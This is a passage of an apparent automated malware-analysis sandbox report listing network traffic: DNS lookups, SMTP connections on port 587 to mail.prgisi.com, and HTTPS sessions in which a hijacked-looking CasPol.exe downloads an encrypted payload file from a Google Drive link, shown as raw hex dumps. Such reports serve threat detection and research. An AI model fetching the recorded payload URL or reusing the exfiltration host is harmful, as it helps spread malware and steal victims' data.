Oct 3, 2022 16:13:55.583105087 CEST	49810	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.583718061 CEST	49809	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.764763117 CEST	587	49810	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.765086889 CEST	587	49809	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.793030024 CEST	49809	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.793248892 CEST	49810	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.974649906 CEST	587	49809	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.974709034 CEST	587	49810	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.974956036 CEST	49810	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.974965096 CEST	49809	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.975029945 CEST	587	49809	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.975083113 CEST	587	49810	216.218.206.36	192.168.11.20
Oct 3, 2022 16:13:55.975227118 CEST	49809	587	192.168.11.20	216.218.206.36
Oct 3, 2022 16:13:55.975227118 CEST	49810	587	192.168.11.20	216.218.206.36

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2022 16:13:30.168185949 CEST	53449	53	192.168.11.20	1.1.1.1
Oct 3, 2022 16:13:30.177548885 CEST	53	53449	1.1.1.1	192.168.11.20
Oct 3, 2022 16:13:31.314471960 CEST	61911	53	192.168.11.20	1.1.1.1
Oct 3, 2022 16:13:31.353728056 CEST	53	61911	1.1.1.1	192.168.11.20
Oct 3, 2022 16:13:54.071614027 CEST	53511	53	192.168.11.20	1.1.1.1
Oct 3, 2022 16:13:54.376816034 CEST	53	53511	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2022 16:13:30.168185949 CEST	192.168.11.20	1.1.1.1	0x14e2	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Oct 3, 2022 16:13:31.314471960 CEST	192.168.11.20	1.1.1.1	0x691c	Standard query (0)	doc-04-9o-docs.googleusercontent.com	A (IP address)	IN (0x0001)	false
Oct 3, 2022 16:13:54.071614027 CEST	192.168.11.20	1.1.1.1	0xe373	Standard query (0)	mail.prgisi.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2022 16:11:03.518526077 CEST	1.1.1.1	192.168.11.20	0x4433	No error (0)	devcenterapi.azure-api.net	apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2022 16:11:03.518526077 CEST	1.1.1.1	192.168.11.20	0x4433	No error (0)	devcenterapi-eastus-01.regional.azure-api.net	apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2022 16:13:30.177548885 CEST	1.1.1.1	192.168.11.20	0x14e2	No error (0)	drive.google.com		142.250.186.46	A (IP address)	IN (0x0001)	false
Oct 3, 2022 16:13:31.353728056 CEST	1.1.1.1	192.168.11.20	0x691c	No error (0)	doc-04-9o-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 3, 2022 16:13:31.353728056 CEST	1.1.1.1	192.168.11.20	0x691c	No error (0)	googlehosted.l.googleusercontent.com		142.250.185.161	A (IP address)	IN (0x0001)	false
Oct 3, 2022 16:13:54.376816034 CEST	1.1.1.1	192.168.11.20	0xe373	No error (0)	mail.prgisi.com		216.218.206.36	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

doc-04-9o-docs.googleusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49807	142.250.186.46	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-03 14:13:30 UTC	0	OUT	GET /uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2022-10-03 14:13:31 UTC	0	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 03 Oct 2022 14:13:31 GMT Location: https://doc-04-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6hlr1tkp3eh3vjbce1k0vd1dfr/1664806350000/11764323936253178614//1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC?e=download&uuid=b16c09ae-0bb5-4390-9a1a-296b303d6b25 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-Q7oEPH4O0j1rpxAcc86Guw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49808	142.250.185.161	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-03 14:13:31 UTC	1	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6hlr1tkp3eh3vjbce1k0vd1dfr/1664806350000/11764323936253178614/*/1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC?e=download&uuid=b16c09ae-0bb5-4390-9a1a-296b303d6b25 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-04-9o-docs.googleusercontent.com Connection: Keep-Alive
2022-10-03 14:13:31 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdu7QBwDTDrLYkUy32Ygwr2YxyqmGVwi-iAt7lnHkZhV8osplJIq4k1Rz5suLUCabTVsnQDmcy1Nvz6GBd1VkQiQFQ Content-Type: application/octet-stream Content-Disposition: attachment; filename="nRdNTJOgFp231.mix"; filename=UTF-8''nRdNTJOgFp231.mix Access-Control-Allow-Origin: Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context Access-Control-Allow-Methods: GET,HEAD,OPTIONS Content-Length: 214592 Date: Mon, 03 Oct 2022 14:13:31 GMT Expires: Mon, 03 Oct 2022 14:13:31 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=7Zyc2g== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2022-10-03 14:13:31 UTC	5	IN	Data Raw: ab ab 2c d8 9b 6a ef 0e 7a 78 9b 81 e5 5b 8d f0 c8 bf 01 52 ec d5 e4 a5 1b 24 75 ba 03 c3 a1 bf 9a 93 b9 ca cc ef b6 a2 0c f0 c8 34 d0 85 31 46 f5 89 cd 6e 9b 35 13 7a 4f 94 85 c6 5f 80 50 90 63 db 14 77 22 16 90 a5 0b 92 76 bc 51 ed 6e 73 bd 6c 62 ad 9c 3d 4d 45 10 bc 29 4d c1 1c df 44 e2 14 0d 92 8d ab 7d f6 a6 1e 4b 01 8a 6f 6f 99 20 f8 2d 83 eb 00 20 25 3f ce 5a 8a 38 8b 54 68 69 64 15 1a 70 1d 15 05 b2 3c df 2e a9 a9 98 41 d8 58 05 9c e4 7a e8 4b 9c 60 3a 94 ca 5f 1e 82 5f 2e 2c 71 31 b3 df b8 8a 3a f3 6a e9 2b 77 9a 41 46 0d 0c 13 b4 46 4a 35 17 f4 9b 28 59 de 80 81 07 4d 8e c4 a3 6b d2 bb 5b 79 76 f7 74 8a 9e 2e e1 55 32 ed 15 ca 0c 89 77 22 6e ec 66 49 03 db cb 25 6e c5 49 1c 70 78 e1 41 f2 77 6a 52 ab 4e f2 60 d2 58 64 4e 2a 08 6e 1a 1e 71 43 22 Data Ascii: ,jzx[R$u41Fn5zO_Pcw"vQnslb=ME)MD}Koo - %?Z8Thidp<.AXzK`:__.,q1:j+wAFFJ5(YMk[yvt.U2w"nfI%nIpxAwjRN`XdN*nqC"
2022-10-03 14:13:31 UTC	9	IN	Data Raw: 31 62 1e ce 70 82 d8 e0 11 b7 85 d6 e3 ab 34 4c 7c 5e 21 9e e6 db 06 f4 6c 8c 80 fb 4e de b4 57 f6 e6 8f c4 0d b9 62 85 f9 cc 11 5f be bc 5f 18 5b c1 9f 52 5e 87 4d bf 9e 2f 76 87 10 84 ad 94 fe 16 b8 8b 85 df eb 77 62 2a 74 9c 7f 13 9e 98 70 c6 83 68 90 30 f3 63 16 39 1a 9d 17 77 a2 06 71 b1 e2 18 90 6d 7e 7b 39 6b 3c b2 71 c6 8d 50 74 0a 8c 22 46 15 08 54 2b 70 3f f0 bc ab dc fc 69 c5 2b 9b 59 7e 2d ee 30 67 e9 d9 d7 1e fe 7f c5 70 cf 97 88 b7 1e 7c 81 b8 03 f7 5e 73 d6 b6 92 1d 5d f2 af 1a 95 c7 c2 62 3b 5e 61 f8 95 a3 9b ab 2b fd c1 67 c8 2e 2b 29 fc bb 13 fa a7 5b bb 38 cd bb 24 33 ff ba 17 b7 69 8d 48 f0 c2 08 7b 71 9a 3b 67 8e 45 45 3d 50 2b bf 78 f5 33 8d fa 93 3f d5 b6 04 00 a5 00 d4 e5 37 03 48 38 e6 f7 2a e8 7d bd dd ac 7f 26 da 6d d2 bb 95 f9 Data Ascii: 1bp4L\|^!lNWb__[R^M/vwbtph0c9wqm~{9k<qPt"FT+p?i+Y~-0gp\|^s]b;^a+g.+)[8$3iH{q;gEE=P+x3?7H8}&m
2022-10-03 14:13:31 UTC	13	IN	Data Raw: d6 e8 ac e6 5a 4e 8d fe d2 f2 03 53 7f b2 38 79 b0 0b 38 08 2c cd 0b f0 69 aa 55 67 e7 67 90 90 18 88 16 90 af 27 38 76 bc a4 01 62 62 03 6b 74 aa 12 8a 22 3d 50 bc 23 45 d0 10 d1 41 f3 18 62 39 8d ab 77 de 0a 1e 4b 0b 99 65 47 cc 20 f8 27 92 e1 6f 76 25 3f c4 49 81 a9 8d 45 63 71 6a a4 9a c7 c6 64 c8 93 8e cf 76 0b 25 cc 29 bb 06 8b 32 80 04 9b 4c c7 0d 1a f6 87 3d 61 f9 5e 34 4e 14 10 ae cb d6 aa 59 41 5b ab 63 32 bd a2 9e 06 11 3d b9 41 68 8d 15 f4 9d 3b 5c cf 85 d4 41 43 8a a0 0c 68 d2 c3 87 4f 40 f7 74 80 97 41 b7 55 32 07 06 cc 1c 84 67 2d 78 fd 5e c4 b4 b4 bb 25 6e cf 58 1a 74 70 be cc 45 18 32 52 ab 44 da c6 d2 58 6e 26 b2 0a 4e 1c 18 59 dc 20 ca 63 82 f1 6c 68 33 61 6f ba 2a d7 e0 11 67 78 0b e2 8c b3 4c 33 97 51 40 af 6f eb 99 9a d7 b8 4c 92 ca Data Ascii: ZNS8y8,iUgg'8vbbkt"=P#EAb9wKeG 'ov%?IEcqjdv%)2L=a^4NYA[c2=Ah;\AChO@tAU2g-x^%nXtpE2RDXn&NY clh3ao*gxL3Q@oL
2022-10-03 14:13:31 UTC	17	IN	Data Raw: ca 03 b9 d6 85 f9 cc a5 db 91 ec 5f 19 45 fd f9 47 76 23 65 95 94 09 5b db 3f c2 85 52 f6 3e cd 9f 08 de c3 23 63 3e 6a a0 71 8f 9e 9e 7c fa ee af 92 3a ee f8 83 3e 1a 9c 1b 6a a0 3a 29 2f e2 1e 38 4c 78 05 24 61 30 be 4d b6 47 52 72 24 d2 ad 41 13 67 18 38 74 24 56 a3 9b 3d 94 6b c3 8f 28 54 73 11 b4 18 fb e3 d5 cf 34 50 63 c5 7a e7 bd ec 8f 19 62 0b 77 1b df 29 67 5b b7 30 14 74 b6 bb 0e b7 73 b0 60 31 4c 61 18 97 a3 9b bf 8e 89 c3 67 cf 12 6b 3d d4 2d 3b dc ad 73 5b e5 0a b1 0c e3 f9 92 22 8d 07 78 9b 3b ed 49 53 ba 92 13 4b 98 c8 44 3b 78 78 ab 6c eb 33 22 fa 93 3f 92 40 04 00 a5 22 7e f7 12 2d 56 13 e6 fd 21 d6 02 97 ea aa 57 04 04 6d d2 97 bd bc 58 20 81 38 a6 57 1d 61 28 65 60 3e 1e 3e e1 a8 1c ce 67 4a 2f d4 13 90 d4 c8 9e f5 fe 1a 00 93 0c bd e7 Data Ascii: _EGv#e[?R>#c>jq\|:>j:)/8Lx$a0MGRr$Ag8t$V=k(Ts4Pczbw)g[0ts`1Lagk=-;s["x;ISKD;xxl3"?@"~-V!WmX 8Wa(e`>>gJ/
2022-10-03 14:13:31 UTC	18	IN	Data Raw: cd d5 5f fb 48 fc a7 48 a2 c0 4a be 70 97 97 e8 48 45 76 16 d3 38 5a 64 0c 39 66 51 ec 2a b2 3a 34 3d c3 17 57 91 f7 96 ee bf 14 6f d8 7d d5 28 1f ac b1 a8 a3 50 ec 3f 39 85 54 db b5 bf f4 75 6a b7 4e 2e a2 4b cc a5 65 32 80 82 23 a2 14 a5 a2 bd 9e 4d 70 8c 3f 46 7c 0e 12 d2 59 a2 00 46 6f 39 00 f7 ea 39 82 b2 cd 54 ad 7c ba 72 4c 7c 2e e9 df 1d 74 42 a2 de b9 cc 1e 96 3b 57 c6 ac 58 64 3d 3d 00 05 fa 1d 0f 90 0c 1c f7 db 95 ef 0d ed f7 31 09 d8 ce c2 0a 2b 4b da 96 df 89 cf 44 9e fe e9 6c 10 56 0d cf 36 7c de c3 eb 08 26 a8 b0 f7 42 8f 57 74 a3 87 81 84 7d 55 0b 90 a5 0d 81 70 ad aa 03 68 71 7e 5a 62 ad 98 15 7f 47 50 ba 38 4b ba 7a df 44 e6 3c 2b 92 8d a1 12 60 a6 1e 4d 27 9b 68 00 34 20 f8 27 ae 23 de 04 34 38 bb 60 8a b8 8a 78 64 76 7c da 2e 70 a9 1d Data Ascii: _HHJpHEv8Zd9fQ*:4=Wo}(P?9TujN.Ke2#Mp?F\|YFo99T\|rL\|.tB;WXd==1+KDlV6\|&BWt}Uphq~ZbGP8KzD<+`M'h4 '#48`xdv\|.p
2022-10-03 14:13:31 UTC	19	IN	Data Raw: 51 e4 3c 2b 42 a7 e7 1a e8 18 73 f4 e1 99 b8 11 3a 7e e2 c6 f4 f5 ea 40 42 fa 75 3c 65 54 95 e2 19 bc 1c 53 d2 6c 1e 59 7e a1 db 94 1b 3a e6 09 02 e4 67 54 73 eb 6e 1e c0 81 e2 82 8d eb 63 02 13 49 ea 26 ff c1 7b 50 ca 70 0d 13 a7 7d f6 10 75 90 2e ce 04 53 7e 22 ea d4 ab d5 a1 3f 54 db d1 f8 b5 3b 8a f4 fc 3f 86 bd f2 ae 4b 33 3c 92 90 10 29 99 66 09 70 5b 68 dc de c8 da 9e e4 20 5b 2c 21 18 6b 32 95 df 87 a1 10 3b 66 e5 c5 aa 2d db 58 44 de 15 12 84 df 0c a4 99 98 d4 6e c5 31 66 f2 d8 59 2f 1e cf 69 2f c0 f7 2f cc 8a 74 f4 06 2a 43 d8 92 21 9e ed 75 05 f9 0a 81 8d 75 fd 7a 79 57 f6 ed 8f dc 18 88 07 25 e8 c5 a9 43 1a 6e 5f 18 50 4b fc 5f 4d 8f 74 9b 8a 3b 6b 0c 6b d6 ad 95 e7 2e da 99 93 ce 5f 32 72 3d 68 28 48 03 86 88 ea ff d6 71 86 a6 f9 fe 14 2f 86 Data Ascii: Q<+Bs:~@Bu<eTSlY~:gTsncI&{Pp}u.S~"?T;?K3<)fp[h [,!k2;f-XDn1fY/i//t*C!uuzyW%Cn_PK_Mt;kk._2r=h(Hq/
2022-10-03 14:13:31 UTC	20	IN	Data Raw: 8e bc 58 6b 96 e6 9f 5f 09 9f 29 73 9e 3f 16 e5 1c a9 1c 3b 70 62 1e c4 13 9a c2 13 9f e3 01 00 50 ba 00 ee ce 93 38 8a 6e c5 89 c1 ee 8f a3 64 ed f7 d7 da df cd db 64 c2 60 cb ad 65 a4 1c 31 8f 5a 96 83 c0 76 45 76 1a f5 43 5e 52 03 1c 62 79 20 3b 82 3f 1c ad c3 17 5d 96 c8 96 ff a3 34 69 3e 9a d5 28 15 ae ae 39 9f 7c e5 3f 5a e5 5c d9 c4 a3 ea 78 6e 96 9b d2 a3 61 e8 be ce 32 8a eb 4b 98 14 af 78 bc b6 65 4f 95 c1 4d 5d 34 5b e8 59 a8 da 33 53 15 06 f4 ad ea 82 b2 c1 ae b5 0a 8c 7b 57 86 07 08 d4 15 01 68 90 de b3 cc 2a a4 3b 5e db 6b 95 48 3f 25 0f 7e c5 07 f1 95 08 de 8b e1 93 c7 3a c5 5a 3b 1e f6 57 14 06 36 55 de 8e c7 18 5b 68 8f 86 c0 69 01 57 7f b6 1e d0 df ac 3e 1e 17 bb be fd 69 a9 50 8d cd 02 83 93 7a 21 1f 8e 5b 0e be 74 97 ab 2a 08 8c fa 93 Data Ascii: Xk_)s?;pbP8ndd`e1ZvEvC^Rby ;?]4i>(9\|?Z\xna2KxeOM]4[Y3S{Wh;^kH?%~:Z;W6U[hiW>iPz![t
2022-10-03 14:13:31 UTC	21	IN	Data Raw: 5a 64 08 02 3b 4e 1a 14 f1 48 22 ca 61 77 db 6a 68 39 26 3d ba 2a db 9c 18 77 7e 10 8a 95 a3 4b b7 22 21 4b 51 6e be a4 85 c6 d8 4c 92 c4 5a 2a 7c 1e 64 77 2f 42 e3 27 a2 5a a0 f1 71 c0 c4 76 fe f0 9c b6 11 87 d0 9a 7b 68 e9 62 ea 44 f8 74 36 52 77 93 fd 1c 63 c3 df 50 68 c3 e6 7d bb b8 1a 86 21 d5 11 74 c5 91 54 77 c9 41 eb c0 87 c0 ba a5 13 69 82 10 5a e0 0a 84 61 7e 5a c9 1d 44 48 59 76 e7 04 37 7f 24 20 9f 9c 17 f1 fd 02 22 cc a9 3d 55 ce f4 da b2 2d 91 79 e3 21 ae 40 2f d4 44 22 37 86 9e 09 c9 89 41 9e b9 7a 91 dc da ea c2 91 6a 91 ff 9d 21 18 60 a1 90 e7 d1 a4 cd 61 64 f4 c9 be 1a 07 6b 5d aa 25 b3 84 db 24 bf 91 8c fa 9d f4 31 60 e3 d5 57 2f 1e ca a7 1c d4 f8 39 df 98 fe d6 10 43 5c 54 10 25 b6 e7 d5 14 f0 3a a3 80 fb 40 76 f2 57 f6 e8 f0 d3 12 91 Data Ascii: Zd;NH"awjh9&=w~K"!KQnLZ\|dw/B'Zqv{hbDt6RwcPh}!tTwAiZa~ZDHYv7$ "=U-y!@/D"7Azj!`adk]%$1`W/9C\T%:@vW
2022-10-03 14:13:31 UTC	23	IN	Data Raw: 21 b7 69 83 4c e8 e8 5d 7d 59 a3 13 4d 84 c5 4a 3b 78 7d 87 a6 ff 1b be d2 97 35 ba e6 6b 0e ae 28 aa 88 25 04 60 19 ce f3 2c c0 0e d0 d3 ab 57 04 b5 7e d5 bd b7 aa a6 60 c2 14 86 29 14 61 28 61 62 86 36 87 e0 a8 1a 52 b1 4a 2f ce 3b a3 d4 ed 94 75 f6 01 30 92 34 7c e6 6e 39 a2 6c ed ba c7 81 8b a9 ba e8 bd ed ed df c7 c7 89 c7 60 f8 ad 65 a8 ad 3f 89 70 9d fc d3 77 45 7c 43 d9 27 5f 5b 0c 39 66 7b 99 00 f8 3c 1c 08 ac c0 5d b9 c2 be dd b5 39 5b 2b 93 d5 28 11 8c ea ef 9a 50 ec 3f 5a 8c 5d d9 c4 e6 e6 74 6e 95 ab 28 a2 4d e2 f9 6b 33 8a e7 a4 b1 15 af 76 fa 97 78 38 85 3f 4c 75 24 9d fa 13 a8 de 4a 07 1c 07 f0 8f 70 b1 b2 c7 82 2f 0e 8c 72 48 53 1d 5a d4 1d 72 6e 93 66 91 8c 36 a9 3d 38 c5 94 94 6e 15 0e 02 7e c6 9d 06 94 24 d5 2b d5 b6 ef 08 ed f7 31 14 Data Ascii: !iL]}YMJ;x}5k(%`,W~`)a(ab6RJ/;u04\|n9l`e?pwE\|C'_[9f{<]9[+(P?Z]tn(Mk3vx8?Lu$Jp/rHSZrnf6=8n~$+1
2022-10-03 14:13:31 UTC	24	IN	Data Raw: fe 82 42 4d 8a 8e cd 02 d2 c9 8c 79 1e f7 73 90 60 2f cd 58 4c 5e 15 c8 09 84 19 42 6e ec 5c 51 08 db c4 3c 90 c4 65 15 0e 35 ba 42 f6 5b 43 48 a0 4e f5 7b 2c 59 48 06 28 88 1d 1a 1e 75 5d 29 ca 62 bd 29 6d 44 3b 16 32 ba 2d c1 0d 17 5a 77 64 b6 9a a2 4f 91 0f 23 33 af 68 f9 76 9d 94 de 58 6c c6 14 2f 7e 18 11 2e 1c 42 e5 27 3b 58 a0 f6 63 e3 19 5f fc e7 95 a9 1f aa 37 e5 5e 6a c2 63 fa 31 05 8b cf 50 44 93 fd 05 d3 c9 df c8 6d 1e 58 40 bb b8 09 8f 36 de 83 0b cc 91 54 7b ff b8 e8 ec 96 96 80 a5 13 67 7c 07 5a e0 0a 36 32 7b 5a c3 25 a2 13 a7 77 fa 12 67 81 2d 5f bd 7b 68 d4 f6 05 3f 9a bf 3f 55 cc 7e f6 bd 21 9b f1 f5 2d 50 45 de a5 46 35 49 9b 81 1d 33 2a 72 8a cb 73 99 c4 20 c3 e7 81 42 93 d7 ae 27 77 4b 20 99 ed be 82 11 3b 6b fe d0 b0 05 29 47 4b 2a Data Ascii: BMys`/XL^Bn\Q<e5B[CHN{,YH(u])b)mD;2-ZwdO#3hvXl/~.B';Xc_7^jc1PDmX@6T{g\|Z62{Z%wg-_{h??U~!-PEF5I3rs B'wK ;k)GK
2022-10-03 14:13:31 UTC	25	IN	Data Raw: b3 ef 81 1e 76 29 99 2e df 2f 7b 08 b0 1a 15 65 a2 af 1a 9f ef b0 7b 20 58 45 f7 95 a3 9c b2 33 86 c3 37 ce 06 7f 15 fc b1 2a f4 96 59 bd e3 22 89 25 33 f3 ba 1a b5 69 81 4c f7 ea 5d 71 7c 82 10 59 9d 41 51 3f 6e 6b be 6e ec 1e ac ff 85 26 bc f2 02 14 bc 2f b2 e0 21 2d d6 13 e6 f1 0a c7 20 8c dc aa 5d 04 04 7d f1 95 8b bc 58 6b 91 2c ac 7f 2a 61 28 6f be 3e 18 e7 e1 b8 1c 3d 66 4a 2f c4 2d ae d4 fd bb f5 ff 00 2b a6 0f e6 6c 6e 39 8a 55 ed ba d0 c6 b2 a8 ba e8 c5 f3 f4 cc c9 d3 04 f2 49 fc a7 6f b7 d1 35 8e 1f eb 93 c0 7c 2a 43 1d f5 30 2a 8c 52 30 75 21 37 25 f7 39 1c 0e c3 17 5d b9 c8 56 11 4a c6 96 54 65 2a f9 ea 58 4c 27 61 af 13 e7 06 93 58 d4 c6 cc f6 75 6e 9f 83 2c a2 4d 2b 69 9a cd 54 cd be 87 14 af 7d b1 45 66 4e 9a c1 4f 2e 2f 33 2c 58 f7 20 5d Data Ascii: v)./{e{ XE37Y"%3iL]q\|YAQ?nkn&/!- ]}Xk,a(o>=fJ/-+ln9UIo5\|C0R0u!7%9]VJTe*XL'aXun,M+iT}EfNO./3,X ]
2022-10-03 14:13:31 UTC	26	IN	Data Raw: cf 64 4c 28 cc 29 bb 3a 20 83 d4 14 8f 33 ec 08 96 75 ab 31 71 fe 2d 1f 4b 02 21 7e 74 ce bb 57 b1 4d bc 60 4b db 2c 29 63 b5 e3 b3 43 6c 17 1f 9b fa 28 59 d4 5c 0f 5a 4a a2 8e a5 07 b3 c9 8a 6d c9 29 78 a2 a8 2e e1 5f 1a 3a 15 c8 07 5c 76 03 6e ad 3e 4a 03 d9 c3 25 6e 54 49 1c 70 35 ba 42 f2 93 4a 52 ab 42 f2 60 d2 58 64 0e 2a 0a 4e 1a 1e 09 41 22 ca 1f aa d7 6c 9a 39 0e 39 b0 2a dd f3 16 76 7e 1a e7 9a a2 4b e8 20 3e 38 06 6f e1 88 62 b8 d1 4c 98 c0 72 2f 7e 1e 62 5f 1c 42 e3 2d 22 53 a0 f1 7f 1c 18 73 f4 f1 9e a9 14 b4 c9 e4 57 68 e9 67 d1 72 f3 74 3e 78 44 93 be 16 e3 db c9 43 67 26 a7 79 bb b8 18 88 31 fd f6 0b e0 9b 43 fe d0 46 e9 c1 8c f4 9a ae 13 72 09 03 a4 e1 22 51 f9 00 5a c9 1f 40 00 ac 77 f4 10 77 7f 24 6c 89 82 7d d0 27 00 26 e2 b6 b2 52 c8 Data Ascii: dL(): 3u1q-K!~tWM`K,)cCl(Y\ZJm)x._:\vn>J%nTIp5BJRB`XdNA"l99v~K >8obLr/~b_B-"SsWhgrt>xDCg&y1CFr"QZ@ww$l}'&R
